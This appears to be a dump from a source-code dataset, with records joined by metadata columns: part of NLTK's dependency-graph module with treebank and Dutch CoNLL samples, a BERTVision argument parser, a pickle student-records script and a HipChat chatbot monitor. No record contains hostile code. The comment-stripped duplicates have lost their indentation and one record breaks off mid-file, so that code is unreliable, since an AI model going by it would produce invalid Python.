        (3, [1], "NTOP"),
        (4, [3], "NTOP"),
    )
    cyclic = DependencyGraph()
    for address, deps, rel in node_specs:
        cyclic.add_node({"word": None, "deps": deps, "rel": rel, "address": address})
    print(cyclic.contains_cycle())
# Malt-TAB (word, tag, head, relation) rendering of the first sentence of
# the Penn Treebank; used by the demos and the contains_cycle doctest.
treebank_data = """Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""

# A single Dutch sentence in ten-column CoNLL format, used by conll_demo.
conll_data1 = """
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
"""
conll_data2 = """1 Cathy Cathy N N eigen|ev|neut 2 su _ _
2 zag zie V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 hen hen Pron Pron per|3|mv|datofacc 2 obj1 _ _
4 wild wild Adj Adj attr|stell|onverv 5 mod _ _
5 zwaaien zwaai N N soort|mv|neut 2 vc _ _
6 . . Punc Punc punt 5 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
1 Dat dat Pron Pron aanw|neut|attr 2 det _ _
2 werkwoord werkwoord N N soort|ev|neut 6 obj1 _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 ze ze Pron Pron per|3|evofmv|nom 6 su _ _
5 zelf zelf Pron Pron aanw|neut|attr|wzelf 3 predm _ _
6 uitgevonden vind V V trans|verldw|onverv 3 vc _ _
7 . . Punc Punc punt 6 punct _ _
1 Het het Pron Pron onbep|neut|zelfst 2 su _ _
2 hoorde hoor V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 bij bij Prep Prep voor 2 ld _ _
4 de de Art Art bep|zijdofmv|neut 6 det _ _
5 warme warm Adj Adj attr|stell|vervneut 6 mod _ _
6 zomerdag zomerdag N N soort|ev|neut 3 obj1 _ _
7 die die Pron Pron betr|neut|zelfst 6 mod _ _
8 ze ze Pron Pron per|3|evofmv|nom 12 su _ _
9 ginds ginds Adv Adv gew|aanw 12 mod _ _
10 achter achter Adv Adv gew|geenfunc|stell|onverv 12 svp _ _
11 had heb V V hulp|ovt|1of2of3|ev 7 body _ _
12 gelaten laat V V trans|verldw|onverv 11 vc _ _
13 . . Punc Punc punt 12 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 hadden heb V V trans|ovt|1of2of3|mv 0 ROOT _ _
3 languit languit Adv Adv gew|geenfunc|stell|onverv 11 mod _ _
4 naast naast Prep Prep voor 11 mod _ _
5 elkaar elkaar Pron Pron rec|neut 4 obj1 _ _
6 op op Prep Prep voor 11 ld _ _
7 de de Art Art bep|zijdofmv|neut 8 det _ _
8 strandstoelen strandstoel N N soort|mv|neut 6 obj1 _ _
9 kunnen kan V V hulp|inf 2 vc _ _
10 gaan ga V V hulp|inf 9 vc _ _
11 liggen lig V V intrans|inf 10 vc _ _
12 . . Punc Punc punt 11 punct _ _
1 Zij zij Pron Pron per|3|evofmv|nom 2 su _ _
2 zou zal V V hulp|ovt|1of2of3|ev 7 cnj _ _
3 mams mams N N soort|ev|neut 4 det _ _
4 rug rug N N soort|ev|neut 5 obj1 _ _
5 ingewreven wrijf V V trans|verldw|onverv 6 vc _ _
6 hebben heb V V hulp|inf 2 vc _ _
7 en en Conj Conj neven 0 ROOT _ _
8 mam mam V V trans|ovt|1of2of3|ev 7 cnj _ _
9 de de Art Art bep|zijdofmv|neut 10 det _ _
10 hare hare Pron Pron bez|3|ev|neut|attr 8 obj1 _ _
11 . . Punc Punc punt 10 punct _ _
1 Of of Conj Conj onder|metfin 0 ROOT _ _
2 ze ze Pron Pron per|3|evofmv|nom 3 su _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 gewoon gewoon Adj Adj adv|stell|onverv 10 mod _ _
5 met met Prep Prep voor 10 mod _ _
6 haar haar Pron Pron bez|3|ev|neut|attr 7 det _ _
7 vriendinnen vriendin N N soort|mv|neut 5 obj1 _ _
8 rond rond Adv Adv deelv 10 svp _ _
9 kunnen kan V V hulp|inf 3 vc _ _
10 slenteren slenter V V intrans|inf 9 vc _ _
11 in in Prep Prep voor 10 mod _ _
12 de de Art Art bep|zijdofmv|neut 13 det _ _
13 buurt buurt N N soort|ev|neut 11 obj1 _ _
14 van van Prep Prep voor 13 mod _ _
15 Trafalgar_Square Trafalgar_Square MWU N_N eigen|ev|neut_eigen|ev|neut 14 obj1 _ _
16 . . Punc Punc punt 15 punct _ _
"""
# Run all demonstrations when executed as a script.
if __name__ == "__main__":
    demo()
| 39.555128 | 118 | 0.454769 |
from collections import defaultdict
from itertools import chain
from pprint import pformat
import subprocess
import warnings
from nltk.tree import Tree
for tree_str in infile.read().split("\n\n")
]
def left_children(self, node_index):
children = chain.from_iterable(self.nodes[node_index]["deps"].values())
index = self.nodes[node_index]["address"]
return sum(1 for c in children if c < index)
def right_children(self, node_index):
children = chain.from_iterable(self.nodes[node_index]["deps"].values())
index = self.nodes[node_index]["address"]
return sum(1 for c in children if c > index)
def add_node(self, node):
if not self.contains_address(node["address"]):
self.nodes[node["address"]].update(node)
    def _parse(
        self,
        input_,
        cell_extractor=None,
        zero_based=False,
        cell_separator=None,
        top_relation_label="ROOT",
    ):
        """Populate the graph from tabular Malt-Tab / CoNLL input.

        ``input_`` may be a single string or an iterable of lines.  The
        column layout (3, 4, 7 or 10 cells per row) is auto-detected from
        the first row unless a custom ``cell_extractor`` is supplied.
        ``zero_based`` shifts head indices up by one; ``cell_separator``
        defaults to any run of whitespace (str.split default).
        """
        # Per-layout helpers: each maps a row's cells onto the canonical
        # (index, word, lemma, ctag, tag, feats, head, rel) tuple.
        def extract_3_cells(cells, index):
            word, tag, head = cells
            return index, word, word, tag, tag, "", head, ""
        def extract_4_cells(cells, index):
            word, tag, head, rel = cells
            return index, word, word, tag, tag, "", head, rel
        def extract_7_cells(cells, index):
            line_index, word, lemma, tag, _, head, rel = cells
            try:
                index = int(line_index)
            except ValueError:
                # index can't be parsed as an integer, use default
                pass
            return index, word, lemma, tag, tag, "", head, rel
        def extract_10_cells(cells, index):
            line_index, word, lemma, ctag, tag, feats, head, rel, _, _ = cells
            try:
                index = int(line_index)
            except ValueError:
                # index can't be parsed as an integer, use default
                pass
            return index, word, lemma, ctag, tag, feats, head, rel
        extractors = {
            3: extract_3_cells,
            4: extract_4_cells,
            7: extract_7_cells,
            10: extract_10_cells,
        }
        if isinstance(input_, str):
            input_ = (line for line in input_.split("\n"))
        # Strip trailing whitespace and drop blank lines.
        lines = (l.rstrip() for l in input_)
        lines = (l for l in lines if l)
        cell_number = None
        for index, line in enumerate(lines, start=1):
            cells = line.split(cell_separator)
            if cell_number is None:
                cell_number = len(cells)
            else:
                # Every row must keep the layout established by the first row.
                assert cell_number == len(cells)
            if cell_extractor is None:
                try:
                    cell_extractor = extractors[cell_number]
                except KeyError as e:
                    raise ValueError(
                        "Number of tab-delimited fields ({0}) not supported by "
                        "CoNLL(10) or Malt-Tab(4) format".format(cell_number)
                    ) from e
            try:
                index, word, lemma, ctag, tag, feats, head, rel = cell_extractor(
                    cells, index
                )
            except (TypeError, ValueError):
                # Custom extractor that takes only the cells (no index
                # argument); keep the enumerate() index in that case.
                word, lemma, ctag, tag, feats, head, rel = cell_extractor(cells)
            if head == "_":
                # Row without a head (e.g. multi-word token line): skip it.
                continue
            head = int(head)
            if zero_based:
                head += 1
            self.nodes[index].update(
                {
                    "address": index,
                    "word": word,
                    "lemma": lemma,
                    "ctag": ctag,
                    "tag": tag,
                    "feats": feats,
                    "head": head,
                    "rel": rel,
                }
            )
            # Make sure that the fake root node has labeled dependencies.
            if (cell_number == 3) and (head == 0):
                rel = top_relation_label
            self.nodes[head]["deps"][rel].append(index)
        # Resolve the real root: the single dependent of the artificial
        # node 0 under the top relation label.
        if self.nodes[0]["deps"][top_relation_label]:
            root_address = self.nodes[0]["deps"][top_relation_label][0]
            self.root = self.nodes[root_address]
            self.top_relation_label = top_relation_label
        else:
            warnings.warn(
                "The graph doesn't contain a node " "that depends on the root element."
            )
def _word(self, node, filter=True):
w = node["word"]
if filter:
if w != ",":
return w
return w
def _tree(self, i):
node = self.get_by_address(i)
word = node["word"]
deps = sorted(chain.from_iterable(node["deps"].values()))
if deps:
return Tree(word, [self._tree(dep) for dep in deps])
else:
return word
def tree(self):
node = self.root
word = node["word"]
deps = sorted(chain.from_iterable(node["deps"].values()))
return Tree(word, [self._tree(dep) for dep in deps])
def triples(self, node=None):
if not node:
node = self.root
head = (node["word"], node["ctag"])
for i in sorted(chain.from_iterable(node["deps"].values())):
dep = self.get_by_address(i)
yield (head, dep["rel"], (dep["word"], dep["ctag"]))
for triple in self.triples(node=dep):
yield triple
def _hd(self, i):
try:
return self.nodes[i]["head"]
except IndexError:
return None
def _rel(self, i):
try:
return self.nodes[i]["rel"]
except IndexError:
return None
    def contains_cycle(self):
        """Return a list of addresses forming a cycle, or False when the
        graph is acyclic.

        Works by repeatedly relaxing a pairwise path-length table
        (O(n**3) in the number of nodes); the first (a, a) entry found
        proves a node can reach itself, and get_cycle_path() extracts
        the actual cycle.

        NOTE(review): node["deps"] is iterated directly here, which
        yields relation *labels* for dict-valued deps but *addresses*
        for list-valued deps (as built by add_node in the demo below) --
        confirm which representation this method is meant for.
        """
        distances = {}
        # Seed with every direct edge at distance 1.
        for node in self.nodes.values():
            for dep in node["deps"]:
                key = tuple([node["address"], dep])
                distances[key] = 1
        # n relaxation rounds are enough to cover any simple path.
        for _ in self.nodes:
            new_entries = {}
            # Combine every pair of known paths that share an endpoint.
            for pair1 in distances:
                for pair2 in distances:
                    if pair1[1] == pair2[0]:
                        key = tuple([pair1[0], pair2[1]])
                        new_entries[key] = distances[pair1] + distances[pair2]
            for pair in new_entries:
                distances[pair] = new_entries[pair]
                if pair[0] == pair[1]:
                    # A node reaches itself: extract and return the cycle.
                    path = self.get_cycle_path(self.get_by_address(pair[0]), pair[0])
                    return path
        return False  # return []?
def get_cycle_path(self, curr_node, goal_node_index):
for dep in curr_node["deps"]:
if dep == goal_node_index:
return [curr_node["address"]]
for dep in curr_node["deps"]:
path = self.get_cycle_path(self.get_by_address(dep), goal_node_index)
if len(path) > 0:
path.insert(0, curr_node["address"])
return path
return []
def to_conll(self, style):
if style == 3:
template = "{word}\t{tag}\t{head}\n"
elif style == 4:
template = "{word}\t{tag}\t{head}\t{rel}\n"
elif style == 10:
template = (
"{i}\t{word}\t{lemma}\t{ctag}\t{tag}\t{feats}\t{head}\t{rel}\t_\t_\n"
)
else:
raise ValueError(
"Number of tab-delimited fields ({0}) not supported by "
"CoNLL(10) or Malt-Tab(4) format".format(style)
)
return "".join(
template.format(i=i, **node)
for i, node in sorted(self.nodes.items())
if node["tag"] != "TOP"
)
    def nx_graph(self):
        """Convert the dependency graph into a networkx MultiDiGraph.

        Also stores a node-address -> word mapping in ``self.nx_labels``
        for later plotting.  Requires the optional networkx dependency
        (imported lazily here).
        """
        import networkx
        # NOTE(review): range(1, len(self.nodes)) omits the node with the
        # highest address -- confirm whether the last token is really
        # meant to be excluded from the exported graph.
        nx_nodelist = list(range(1, len(self.nodes)))
        # Only nodes with a truthy head contribute (n, head, rel) edges.
        nx_edgelist = [
            (n, self._hd(n), self._rel(n)) for n in nx_nodelist if self._hd(n)
        ]
        self.nx_labels = {}
        for n in nx_nodelist:
            self.nx_labels[n] = self.nodes[n]["word"]
        g = networkx.MultiDiGraph()
        g.add_nodes_from(nx_nodelist)
        g.add_edges_from(nx_edgelist)
        return g
class DependencyGraphError(Exception):
    """Dependency graph exception.

    Fix: the class had no body at all (its docstring was stripped by a
    comment-removal pass), which is a syntax error; restore a body.
    """
def demo():
    """Run every DependencyGraph demonstration in sequence."""
    malt_demo()
    conll_demo()
    conll_file_demo()
    cycle_finding_demo()
def malt_demo(nx=False):
    """Build a dependency graph from Malt-TAB data and pretty-print its
    tree; with nx=True additionally plot the graph via networkx and
    matplotlib (writes tree.png)."""
    dg = DependencyGraph(
        """Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
    )
    tree = dg.tree()
    tree.pprint()
    if nx:
        # currently doesn't work
        import networkx
        from matplotlib import pylab
        g = dg.nx_graph()
        g.info()
        pos = networkx.spring_layout(g, dim=1)
        networkx.draw_networkx_nodes(g, pos, node_size=50)
        networkx.draw_networkx_labels(g, pos, dg.nx_labels)
        pylab.xticks([])
        pylab.yticks([])
        pylab.savefig("tree.png")
        pylab.show()
def conll_demo():
    """Build a graph from a 10-column CoNLL sentence and print its tree,
    the graph itself and its 4-column serialization."""
    dg = DependencyGraph(conll_data1)
    tree = dg.tree()
    tree.pprint()
    print(dg)
    print(dg.to_conll(4))
def conll_file_demo():
    """Parse every sentence in conll_data2 (blank-line separated) and
    pretty-print each resulting tree."""
    print("Mass conll_read demo...")
    graphs = [DependencyGraph(entry) for entry in conll_data2.split("\n\n") if entry]
    for graph in graphs:
        tree = graph.tree()
        print("\n")
        tree.pprint()
def cycle_finding_demo():
    """Show contains_cycle() on an acyclic treebank graph and on a
    hand-built graph containing the cycle 1 -> 2 -> 4 -> 3 -> 1."""
    dg = DependencyGraph(treebank_data)
    print(dg.contains_cycle())
    cyclic_dg = DependencyGraph()
    cyclic_dg.add_node({"word": None, "deps": [1], "rel": "TOP", "address": 0})
    cyclic_dg.add_node({"word": None, "deps": [2], "rel": "NTOP", "address": 1})
    cyclic_dg.add_node({"word": None, "deps": [4], "rel": "NTOP", "address": 2})
    cyclic_dg.add_node({"word": None, "deps": [1], "rel": "NTOP", "address": 3})
    cyclic_dg.add_node({"word": None, "deps": [3], "rel": "NTOP", "address": 4})
    print(cyclic_dg.contains_cycle())
# Malt-TAB sample sentence (word, tag, head, relation) used by
# cycle_finding_demo().
treebank_data = """Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
# Single 10-column CoNLL sentence (Dutch) used by conll_demo().
conll_data1 = """
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
"""
conll_data2 = """1 Cathy Cathy N N eigen|ev|neut 2 su _ _
2 zag zie V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 hen hen Pron Pron per|3|mv|datofacc 2 obj1 _ _
4 wild wild Adj Adj attr|stell|onverv 5 mod _ _
5 zwaaien zwaai N N soort|mv|neut 2 vc _ _
6 . . Punc Punc punt 5 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
1 Dat dat Pron Pron aanw|neut|attr 2 det _ _
2 werkwoord werkwoord N N soort|ev|neut 6 obj1 _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 ze ze Pron Pron per|3|evofmv|nom 6 su _ _
5 zelf zelf Pron Pron aanw|neut|attr|wzelf 3 predm _ _
6 uitgevonden vind V V trans|verldw|onverv 3 vc _ _
7 . . Punc Punc punt 6 punct _ _
1 Het het Pron Pron onbep|neut|zelfst 2 su _ _
2 hoorde hoor V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 bij bij Prep Prep voor 2 ld _ _
4 de de Art Art bep|zijdofmv|neut 6 det _ _
5 warme warm Adj Adj attr|stell|vervneut 6 mod _ _
6 zomerdag zomerdag N N soort|ev|neut 3 obj1 _ _
7 die die Pron Pron betr|neut|zelfst 6 mod _ _
8 ze ze Pron Pron per|3|evofmv|nom 12 su _ _
9 ginds ginds Adv Adv gew|aanw 12 mod _ _
10 achter achter Adv Adv gew|geenfunc|stell|onverv 12 svp _ _
11 had heb V V hulp|ovt|1of2of3|ev 7 body _ _
12 gelaten laat V V trans|verldw|onverv 11 vc _ _
13 . . Punc Punc punt 12 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 hadden heb V V trans|ovt|1of2of3|mv 0 ROOT _ _
3 languit languit Adv Adv gew|geenfunc|stell|onverv 11 mod _ _
4 naast naast Prep Prep voor 11 mod _ _
5 elkaar elkaar Pron Pron rec|neut 4 obj1 _ _
6 op op Prep Prep voor 11 ld _ _
7 de de Art Art bep|zijdofmv|neut 8 det _ _
8 strandstoelen strandstoel N N soort|mv|neut 6 obj1 _ _
9 kunnen kan V V hulp|inf 2 vc _ _
10 gaan ga V V hulp|inf 9 vc _ _
11 liggen lig V V intrans|inf 10 vc _ _
12 . . Punc Punc punt 11 punct _ _
1 Zij zij Pron Pron per|3|evofmv|nom 2 su _ _
2 zou zal V V hulp|ovt|1of2of3|ev 7 cnj _ _
3 mams mams N N soort|ev|neut 4 det _ _
4 rug rug N N soort|ev|neut 5 obj1 _ _
5 ingewreven wrijf V V trans|verldw|onverv 6 vc _ _
6 hebben heb V V hulp|inf 2 vc _ _
7 en en Conj Conj neven 0 ROOT _ _
8 mam mam V V trans|ovt|1of2of3|ev 7 cnj _ _
9 de de Art Art bep|zijdofmv|neut 10 det _ _
10 hare hare Pron Pron bez|3|ev|neut|attr 8 obj1 _ _
11 . . Punc Punc punt 10 punct _ _
1 Of of Conj Conj onder|metfin 0 ROOT _ _
2 ze ze Pron Pron per|3|evofmv|nom 3 su _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 gewoon gewoon Adj Adj adv|stell|onverv 10 mod _ _
5 met met Prep Prep voor 10 mod _ _
6 haar haar Pron Pron bez|3|ev|neut|attr 7 det _ _
7 vriendinnen vriendin N N soort|mv|neut 5 obj1 _ _
8 rond rond Adv Adv deelv 10 svp _ _
9 kunnen kan V V hulp|inf 3 vc _ _
10 slenteren slenter V V intrans|inf 9 vc _ _
11 in in Prep Prep voor 10 mod _ _
12 de de Art Art bep|zijdofmv|neut 13 det _ _
13 buurt buurt N N soort|ev|neut 11 obj1 _ _
14 van van Prep Prep voor 13 mod _ _
15 Trafalgar_Square Trafalgar_Square MWU N_N eigen|ev|neut_eigen|ev|neut 14 obj1 _ _
16 . . Punc Punc punt 15 punct _ _
"""
# Run the full demo suite when the module is executed as a script.
if __name__ == "__main__":
    demo()
| true | true |
f7100dfc5d3a59776b012e0dd0e3c6e254fd289d | 2,169 | py | Python | code/torch/models/hypersearch/args.py | siduojiang/BERTVision | 9d0d4856300973488ead67e2d06e243bf07447ad | [
"MIT"
] | 5 | 2020-08-06T10:12:08.000Z | 2022-03-17T10:38:40.000Z | code/torch/models/hypersearch/args.py | siduojiang/BERTVision | 9d0d4856300973488ead67e2d06e243bf07447ad | [
"MIT"
] | 9 | 2020-06-23T16:57:52.000Z | 2021-01-17T01:52:45.000Z | code/torch/models/hypersearch/args.py | cbenge509/BERTVision | 01519bea0882fa72e86a1b62f2d0d52d22c26dfc | [
"MIT"
] | null | null | null | import os, sys
sys.path.append("C:\\BERTVision\\code\\torch")
import torch
import models.args
def get_args():
    """Assemble the argument parser for hyperparameter-search runs.

    Extends the shared parser from ``models.args`` with search-specific
    options and returns the parsed namespace.
    """
    # Start from the general, project-wide argument set.
    parser = models.args.get_args()
    # (flag, keyword-arguments) pairs for every search-specific option.
    option_specs = [
        ('--model',
         dict(type=str, default='MSR', required=True)),
        ('--checkpoint',
         dict(type=str, default='bert-base-uncased', required=True,
              help='A HuggingFace checkpoint e.g., bert-base-uncased')),
        ('--num-labels',
         dict(default=2, type=int)),
        ('--max-seq-length',
         dict(default=86, type=int, help='Tokenization max length')),
        ('--save-path',
         dict(type=str, default=os.path.join('model_checkpoints'))),
        ('--log-path',
         dict(type=str, default=os.path.join('model_logs'))),
        ('--warmup-proportion',
         dict(default=0.1, type=float,
              help='Proportion of training to perform linear learning rate warmup for')),
        ('--batch-size',
         dict(type=int, default=16,
              help='input batch size for training (default: 16)')),
        ('--lr',
         dict(type=float, default=1e-5, help='learning rate (default: 1e-5)')),
        ('--num-workers',
         dict(type=int, default=0, help='Number of CPU cores (default: 0)')),
        ('--shard',
         dict(type=float, default=0.10,
              help='Percentage of training set to sample from')),
    ]
    for flag, kwargs in option_specs:
        parser.add_argument(flag, **kwargs)
    return parser.parse_args()
| 37.396552 | 97 | 0.467958 | import os, sys
sys.path.append("C:\\BERTVision\\code\\torch")
import torch
import models.args
def get_args():
parser = models.args.get_args()
parser.add_argument('--model',
type=str,
default='MSR',
required=True)
parser.add_argument('--checkpoint',
type=str,
default='bert-base-uncased',
required=True,
help='A HuggingFace checkpoint e.g., bert-base-uncased')
parser.add_argument('--num-labels',
default=2,
type=int)
parser.add_argument('--max-seq-length',
default=86,
type=int,
help='Tokenization max length')
parser.add_argument('--save-path',
type=str,
default=os.path.join('model_checkpoints'))
parser.add_argument('--log-path',
type=str,
default=os.path.join('model_logs'))
parser.add_argument('--warmup-proportion',
default=0.1,
type=float,
help='Proportion of training to perform linear learning rate warmup for')
parser.add_argument('--batch-size',
type=int,
default=16,
help='input batch size for training (default: 16)')
parser.add_argument('--lr',
type=float,
default=1e-5,
help='learning rate (default: 1e-5)')
parser.add_argument('--num-workers',
type=int,
default=0,
help='Number of CPU cores (default: 0)')
parser.add_argument('--shard',
type=float,
default=0.10,
help='Percentage of training set to sample from')
args = parser.parse_args()
return args
| true | true |
f7100f39a080309ca2cb603931b8da369057f812 | 717 | py | Python | BOOK/MAIN/05-file-handling/chapter-5-examples/15-display-records.py | kabirsrivastava3/python-practice | f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5 | [
"MIT"
] | null | null | null | BOOK/MAIN/05-file-handling/chapter-5-examples/15-display-records.py | kabirsrivastava3/python-practice | f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5 | [
"MIT"
] | null | null | null | BOOK/MAIN/05-file-handling/chapter-5-examples/15-display-records.py | kabirsrivastava3/python-practice | f56a4a0764031d3723b0ba4cd1418a1a83b1e4f5 | [
"MIT"
] | null | null | null | #display records of students of roll no. 22 and 23.
# Display the records of students with roll numbers 22 and 23 from Stu.dat.
import pickle

stu = {}               # holds one unpickled record at a time
found = False          # set once at least one matching record is printed
searchKeys = [22, 23]  # roll numbers we are looking for

# Fix: "with" guarantees the file is closed even when an unexpected
# exception occurs (the original only closed it on the EOFError path,
# leaking the handle on any other error).
with open('Stu.dat', "rb") as finObj:
    try:
        print("File Stu.dat store these records")
        while True:  # pickle.load raises EOFError at end of file
            stu = pickle.load(finObj)
            if stu['Rollno'] in searchKeys:
                print(stu)
                found = True
    except EOFError:
        if not found:
            print("No such records found in the file")
        else:
            print("Search successful.")
| 29.875 | 88 | 0.665272 |
import pickle
stu = {}
found = False
finObj = open('Stu.dat',"rb")
searchKeys = [22,23]
try:
print("File Stu.dat store these records")
while True:
stu = pickle.load(finObj)
if stu['Rollno'] in searchKeys:
print(stu)
found = True
except EOFError:
if found == False:
print("No such records found in the file")
else:
print("Search successful.")
finObj.close()
| true | true |
f7100ff56bd69c1d3a211ca0a9af3fcd0dae54de | 1,835 | py | Python | client/hipchat/HipChatMonitor.py | xEoDx/eodbot | 933d9c1c9c836a5a6091a26bfd4d7eb98f932595 | [
"Apache-2.0"
] | null | null | null | client/hipchat/HipChatMonitor.py | xEoDx/eodbot | 933d9c1c9c836a5a6091a26bfd4d7eb98f932595 | [
"Apache-2.0"
] | 5 | 2020-03-04T21:39:32.000Z | 2021-12-09T19:43:28.000Z | client/hipchat/HipChatMonitor.py | xEoDx/eodbot | 933d9c1c9c836a5a6091a26bfd4d7eb98f932595 | [
"Apache-2.0"
] | null | null | null | from hipchat import HipChatManager
import time
import configparser
# Bounds (in seconds) for the adaptive polling interval.
_MAX_SLEEP_TIME = 5
_MIN_SLEEP_TIME = 2
# Number of poll iterations between repeated "teach me" URL announcements.
_SPAM_EODBOT_URL = 3500
class HipChatMonitor:
    """Polls a HipChat room, feeds each new message to the EodBot parser
    and posts the parser's reply back, backing off the polling interval
    while the room is quiet."""

    def __init__(self, eodBotParser):
        print("Initializing HipChatMonitor with eodBotParser: ", eodBotParser)
        self.sleepTime = _MIN_SLEEP_TIME
        self.lastIdChecked = ""
        self.eodBotParser = eodBotParser
        # Bot identity comes from the local config file.
        config = configparser.ConfigParser()
        config.read('config.ini')
        self.bot_id = config['HIPCHAT']['hipchat.bot_id']
        self.hipChatManager = HipChatManager.HipChatManager()
        self.spamLastEodBotUrlTime = 0
        self.hipChatManager.send("[EodBot] I've been initialised! Troll time just started :)")
        self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")

    def __adjustInterval(self, failed):
        """Back off polling after an idle poll; reset after a live one.

        Fix: ``failed`` is now a real boolean -- the original compared
        against the *string* "true", a latent bug waiting for any caller
        passing an actual bool (which would always reset the interval).
        """
        if failed:
            if self.sleepTime < _MAX_SLEEP_TIME:
                self.sleepTime += 1
        else:
            self.sleepTime = _MIN_SLEEP_TIME

    def start(self):
        """Run the polling loop forever (blocks the calling thread)."""
        while True:
            newestMessage = self.hipChatManager.fetch()
            # Ignore Sassy, our own messages, and anything already handled.
            if ((str(newestMessage["from"]) != "Sassy")
                    and (str(newestMessage["from"]["id"]) != self.bot_id)
                    and (newestMessage["id"] != self.lastIdChecked)):
                self.lastIdChecked = newestMessage["id"]
                print("Parsing message: ", newestMessage['message'])
                messageToSend = self.eodBotParser.parse(newestMessage['message'])
                if messageToSend is not None:
                    self.hipChatManager.send(messageToSend)
                self.__adjustInterval(False)
            else:
                self.__adjustInterval(True)
            print("Sleeping for ", self.sleepTime, " seconds")
            time.sleep(self.sleepTime)
            # Periodically re-announce the teaching URL.
            self.spamLastEodBotUrlTime += 1
            if self.spamLastEodBotUrlTime >= _SPAM_EODBOT_URL:
                self.hipChatManager.send("[EodBot] Visit http://6dc1e2bd.fbdev.midasplayer.com/ to teach me how to troll")
                self.spamLastEodBotUrlTime = 0
| 35.288462 | 149 | 0.725886 | from hipchat import HipChatManager
import time
import configparser
_MAX_SLEEP_TIME = 5
_MIN_SLEEP_TIME = 2
_SPAM_EODBOT_URL = 3500
class HipChatMonitor:
def __init__(self, eodBotParser):
print("Initializing HipChatMonitor with eodBotParser: ",eodBotParser)
self.sleepTime = _MIN_SLEEP_TIME
self.lastIdChecked = ""
self.eodBotParser = eodBotParser
config = configparser.ConfigParser()
config.read('config.ini')
self.bot_id=config['HIPCHAT']['hipchat.bot_id']
self.hipChatManager = HipChatManager.HipChatManager();
self.spamLastEodBotUrlTime = 0
self.hipChatManager.send("[EodBot] I've been initialised! Troll time just started :)")
